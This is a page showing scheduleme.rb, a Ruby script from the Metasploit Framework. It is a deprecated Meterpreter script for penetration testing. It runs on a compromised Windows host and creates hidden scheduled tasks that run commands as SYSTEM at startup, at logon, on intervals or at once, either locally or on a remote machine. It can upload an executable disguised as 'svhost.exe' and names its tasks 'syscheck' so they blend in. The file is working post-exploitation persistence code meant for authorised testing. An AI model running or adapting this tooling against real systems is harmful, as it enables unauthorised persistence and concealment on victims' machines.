CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/scripts/meterpreter/scheduleme.rb
Views: 11766
1
##

2
# WARNING: Metasploit no longer maintains or accepts meterpreter scripts.

3
# If you'd like to improve this script, please try to port it as a post

4
# module instead. Thank you.

5
##

6


7


8


9
#Meterpreter script for automating the most common scheduling tasks

10
#during a pentest. This script will use the schtasks command so as

11
#to provide future compatibility since MS will retire the AT command

12
#in future versions of windows. This script works with Windows XP,

13
#Windows 2003, Windows Vista and Windows 2008.

14
#Version: 0.1.2

15
#Note: in Vista UAC must be disabled to be able to perform scheduling

16
#and the meterpreter must be running under the profile of local admin

17
#or system.

18
################## Variable Declarations ##################

19
session = client

20
@@exec_opts = Rex::Parser::Arguments.new(

21
  "-h" => [ false,"Help menu." ],

22
  "-c" => [ true,"Command to execute at the given time. If options for execution needed use double quotes"],

23
  "-d" => [ false,"Daily." ],

24
  "-H" => [ true,"Every specified hours 1-23."],

25
  "-m" => [ true, "Every specified amount of minutes 1-1439"],

26
  "-e" => [ true, "Executable or script to upload to target host, will not work with remote schedule"],

27
  "-l" => [ false,"When a user logs on."],

28
  "-o" => [ true,"Options for executable when upload method used"],

29
  "-s" => [ false,"At system startup."],

30
  "-i" => [ false,"Run command immediately and only once."],

31
  "-r" => [ false,"Remote Schedule. Executable has to be already on remote target"],

32
  "-u" => [ false,"Username of account with administrative privelages."],

33
  "-p" => [ false,"Password for account provided."],

34
  "-t" => [ true,"Remote system to schedule job."]

35
)

36
################## function declaration Declarations ##################

37
def usage()

38
  print_line("Scheduleme -- provides most common scheduling types used during a pentest")

39
  print_line("This script can upload a given executable or script and schedule it to be")

40
  print_line("executed. All scheduled task are run as System so the Meterpreter process")

41
  print_line("must be System or local admin for local schedules and Administrator for")

42
  print_line("remote schedules")

43
  print_line(@@exec_opts.usage)

44
end

45


46
#---------------------------------------------------------------------------------------------------------

47
def scheduleme(session,schtype,cmd,tmmod,cmdopt,username,password)

48
  execmd = ""

49
  success = false

50
  taskname = "syscheck#{rand(100)}"

51
  if cmdopt != nil

52
    cmd = "#{cmd} #{cmdopt}"

53
  end

54
  case schtype

55
  when "startup"

56
    if username == nil

57
      execmd = "schtasks /create /tn \"#{taskname}\" /tr \"#{cmd}\" /sc onstart /ru system"

58
    else

59
      execmd = "schtasks /create /tn \"#{taskname}\" /tr \"#{cmd}\" /sc onstart /ru system /u #{username} /p #{password}"

60
    end

61
  when "login"

62
    if username == nil

63
      execmd = "schtasks /create /tn \"#{taskname}\" /tr \"#{cmd}\" /sc onlogon /ru system"

64
    else

65
      execmd = "schtasks /create /tn \"#{taskname}\" /tr \"#{cmd}\" /sc onlogon /ru system /u #{username} /p #{password}"

66
    end

67
  when "hourly"

68
    if username == nil

69
      execmd = "schtasks /create /tn \"#{taskname}\" /tr \"#{cmd}\" /sc hourly /mo #{tmmod} /ru system"

70
    else

71
      execmd = "schtasks /create /tn \"#{taskname}\" /tr \"#{cmd}\" /sc hourly /mo #{tmmod} /ru system /u #{username} /p #{password}"

72
    end

73
  when "daily"

74
    if username == nil

75
      execmd = "schtasks /create /tn \"#{taskname}\" /tr \"#{cmd}\" /sc daily /mo #{tmmod} /ru system"

76
    else

77
      execmd = "schtasks /create /tn \"#{taskname}\" /tr \"#{cmd}\" /sc daily /mo #{tmmod} /ru system /u #{username} /p #{password}"

78
    end

79
  when "minute"

80
    if username == nil

81
      execmd = "schtasks /create /tn \"#{taskname}\" /tr \"#{cmd}\"  /sc minute /mo #{tmmod} /ru system"

82
    else

83
      execmd = "schtasks /create /tn \"#{taskname}\" /tr \"#{cmd}\"  /sc minute /mo #{tmmod} /ru system /u #{username} /p #{password}"

84
    end

85
  when "now"

86
    if username == nil

87
      execmd = "schtasks /create /tn \"#{taskname}\" /tr \"#{cmd}\"  /sc once /ru system /st 00:00:00"

88
    else

89
      execmd = "schtasks /create /tn \"#{taskname}\" /tr \"#{cmd}\"  /sc once /ru system /st 00:00:00 /u #{username} /p #{password}"

90
    end

91
  end

92
  print_status("Scheduling command #{cmd} to run #{schtype}.....")

93
  r = session.sys.process.execute("cmd.exe /c #{execmd}", nil, {'Hidden' => 'true','Channelized' => true})

94
  while(d = r.channel.read)

95
    if d =~ /successfully been created/

96
      print_status("The scheduled task has been successfully created")

97
      if username == nil

98
        print_status("For cleanup run schtasks /delete /tn #{taskname} /F")

99
      else

100
        print_status("For cleanup run schtasks /delete /tn #{taskname} /u #{username} /p #{password} /F")

101
      end

102
      success = true

103
    end

104
  end

105
  if !success

106
    print_status("Failed to create scheduled task!!")

107
  elsif success && schtype == "now"

108
    if username == nil

109
      session.sys.process.execute("cmd.exe /c schtasks /run /tn #{taskname}")

110
    else

111
      session.sys.process.execute("cmd.exe /c schtasks /run /tn #{taskname} /u #{username} /p #{password}")

112
    end

113
  end

114
  r.channel.close

115
  r.close

116


117
end

118
#---------------------------------------------------------------------------------------------------------

119
def scheduleremote(session,schtype,cmd,tmmod,cmdopt,targetsys,username,password)

120
  execmd = ""

121
  success = false

122
  taskname = "syscheck#{rand(100)}"

123
  if cmdopt != nil

124
    cmd = "#{cmd} #{cmdopt}"

125
  end

126
  case schtype

127
  when "startup"

128
    if username == nil

129
      execmd = "schtasks /create /tn \"#{taskname}\" /tr \"#{cmd}\" /sc onstart /s #{targetsys} /ru system "

130
    else

131
      execmd = "schtasks /create /tn \"#{taskname}\" /tr \"#{cmd}\" /sc onstart /s #{targetsys} /u #{username} /p #{password} /ru system "

132
    end

133
  when "login"

134
    if username == nil

135
      execmd = "schtasks /create /tn \"#{taskname}\" /tr \"#{cmd}\" /sc onlogon /s #{targetsys} /ru system "

136
    else

137
      execmd = "schtasks /create /tn \"#{taskname}\" /tr \"#{cmd}\" /sc onlogon /s #{targetsys} /u #{username} /p #{password} /ru system "

138
    end

139
  when "hourly"

140
    if username == nil

141
      execmd = "schtasks /create /tn \"#{taskname}\" /tr \"#{cmd}\" /sc hourly /mo #{tmmod} /ru system /s #{targetsys}"

142
    else

143
      execmd = "schtasks /create /tn \"#{taskname}\" /tr \"#{cmd}\" /sc hourly /mo #{tmmod} /ru system /s #{targetsys} /u #{username} /p #{password}"

144
    end

145
  when "daily"

146
    if username == nil

147
      execmd = "schtasks /create /tn \"#{taskname}\" /tr \"#{cmd}\" /sc daily /mo #{tmmod} /ru system /s #{targetsys}"

148
    else

149
      execmd = "schtasks /create /tn \"#{taskname}\" /tr \"#{cmd}\" /sc daily /mo #{tmmod} /ru system /s #{targetsys} /u #{username} /p #{password}"

150
    end

151
  when "minute"

152
    if username == nil

153
      execmd = "schtasks /create /tn \"#{taskname}\" /tr \"#{cmd}\"  /sc minute /mo #{tmmod} /ru system /s #{targetsys}"

154
    else

155
      execmd = "schtasks /create /tn \"#{taskname}\" /tr \"#{cmd}\"  /sc minute /mo #{tmmod} /ru system /s #{targetsys} /u #{username} /p #{password}"

156
    end

157
  when "now"

158
    if username == nil

159
      execmd = "schtasks /create /tn \"#{taskname}\" /tr \"#{cmd}\"  /sc once /ru system /s #{targetsys} /st 00:00:00"

160
    else

161
      execmd = "schtasks /create /tn \"#{taskname}\" /tr \"#{cmd}\"  /sc once /ru system /s #{targetsys} /st 00:00:00 /u #{username} /p #{password}"

162
    end

163
  end

164
  print_status("Scheduling command #{cmd} to run #{schtype}.....")

165
  r = session.sys.process.execute("cmd.exe /c #{execmd}", nil, {'Hidden' => 'true','Channelized' => true})

166
  while(d = r.channel.read)

167
    if d =~ /successfully been created/

168
      print_status("The scheduled task has been successfully created")

169
      print_status("For cleanup run schtasks /delete /tn #{taskname} /s #{targetsys}  /u #{username} /p #{password} /F")

170
      success = true

171
    end

172
  end

173
  if !success

174
    print_status("Failed to create scheduled task!!")

175
  elsif success && schtype == "now"

176
    if username == nil

177
      session.sys.process.execute("cmd.exe /c schtasks /run /tn #{taskname} /s #{targetsys}")

178
    else

179
      session.sys.process.execute("cmd.exe /c schtasks /run /tn #{taskname} /s #{targetsys} /u #{username} /p #{password}")

180
    end

181
  end

182
  r.channel.close

183
  r.close

184


185
end

186
#---------------------------------------------------------------------------------------------------------

187


188
def upload(session,file)

189
  location = session.sys.config.getenv('TEMP')

190
  fileontrgt = "#{location}\\svhost#{rand(100)}.exe"

191
  print_status("Uploading #{file}....")

192
  session.fs.file.upload_file("#{fileontrgt}","#{file}")

193
  print_status("#{file} uploaded!")

194
  return fileontrgt

195
end

196
# Parsing of Options

197
cmd = nil

198
file = nil

199
schtype = ""

200
tmmod = ""

201
cmdopt = nil

202
helpcall = 0

203
remote = 0

204
targetsys = nil

205
username = nil

206
password = nil

207
@@exec_opts.parse(args) { |opt, idx, val|

208
  case opt

209


210
  when "-c"

211
    cmd = val

212
  when "-e"

213
    file = val

214
  when "-d"

215
    tmmod = val

216
    schtype = "daily"

217
  when "-H"

218
    tmmod = val

219
    schtype = "hourly"

220
  when "-m"

221
    tmmod = val

222
    schtype = "minute"

223
  when "-s"

224
    schtype = "startup"

225
  when "-l"

226
    schtype = "login"

227
  when "-i"

228
    schtype = "now"

229
  when "-o"

230
    cmdopt = val

231
  when "-r"

232
    remote = 1

233
  when "-t"

234
    targetsys = val

235
  when "-u"

236
    username = val

237
  when "-p"

238
    password = val

239
  when "-h"

240
    helpcall = 1

241
  end

242


243
}

244
if client.platform == 'windows'

245
  if helpcall == 1

246
    usage()

247
  elsif cmd == nil && file == nil

248
    usage()

249
  elsif !is_uac_enabled? and is_admin?

250
    if file == nil

251
      if remote == 0

252
        scheduleme(session,schtype,cmd,tmmod,cmdopt,username,password)

253
      else

254
        scheduleremote(session,schtype,cmd,tmmod,cmdopt,targetsys,username,password)

255
      end

256
    else

257
      cmd = upload(session,file)

258
      scheduleme(session,schtype,cmd,tmmod,cmdopt,username,password)

259
    end

260
  else

261
    print_status("Meterpreter is not running under sufficient administrative rights.")

262
  end

263
else

264
  print_error("This version of Meterpreter is not supported with this Script!")

265
  raise Rex::Script::Completed

266
end

267


268